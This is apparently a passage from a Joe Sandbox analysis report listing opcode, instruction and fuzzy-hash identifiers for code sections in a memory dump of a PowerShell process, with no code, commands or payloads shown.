                                                                                                                                                                                                                  • Opcode ID: b89accd51cc7685b1f47f02b08fab1e76b5f8dc63ce1752319e7be0725d27509
                                                                                                                                                                                                                  • Instruction ID: a8ca36be3e34b39394d75f3db3e33f5d55cfbc0c9977bc59afa9b882d897329c
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b89accd51cc7685b1f47f02b08fab1e76b5f8dc63ce1752319e7be0725d27509
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32510930709A498FD7A4EF2CD454A65BBE1FF49321B4500FBE489C7262DA64EC85C791
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000013.00000002.2564730966.00007FF7C1190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1190000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_7ff7c1190000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: bafd16e23bfde9eefd73bf45c7fdd8707e51e13b125c0b10eada2c3c52bb90eb
                                                                                                                                                                                                                  • Instruction ID: 975a1779b4ea4005b586a58a836e77b1d499f1765eff9b2cb9a6a48555a65f38
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bafd16e23bfde9eefd73bf45c7fdd8707e51e13b125c0b10eada2c3c52bb90eb
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 56014072B1CA184FE75C9A5C78122BCB3D2E7C9635F44423FE19EC3682DE25A85341C6
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000013.00000002.2564730966.00007FF7C1190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1190000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_7ff7c1190000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: b0ea47f83a181c09a3dd56988848e2dc9a26cdde2e07abfd43212e64e88b62f9
                                                                                                                                                                                                                  • Instruction ID: 256f76ee7404407cf9b7d6a1f166b04f7c0d877083e4ca99a350dcfbb7c1dcc8
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b0ea47f83a181c09a3dd56988848e2dc9a26cdde2e07abfd43212e64e88b62f9
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 04014072B1CA184B97589A5C78162BDB3D2E7C9635F44423FE19EC3682DE25A81341C6
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000013.00000002.2564730966.00007FF7C1190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1190000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_7ff7c1190000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: b373d9caa2ebe5da610b5054fc476717affe208ade59a390fa598098040cbb54
                                                                                                                                                                                                                  • Instruction ID: 45acbd0b82c14c40fd88fcf3294db1fc185c253cab03df9297bcdfa72dc85de4
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b373d9caa2ebe5da610b5054fc476717affe208ade59a390fa598098040cbb54
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 22015E72B1CA184F97589A5C78162BCB3C2E7C9635F04423FE19EC3682DE25A81342C6
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000013.00000002.2564730966.00007FF7C1190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1190000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_7ff7c1190000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                  • Instruction ID: 1d5378c92cedc27d6e108cac399cf2be2265762d81d8a8410e29d1f0c2e64dad
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A01677115CB0C4FD744EF0CE451AA5B7E0FB95364F50056DE58AC3651DA36E882CB45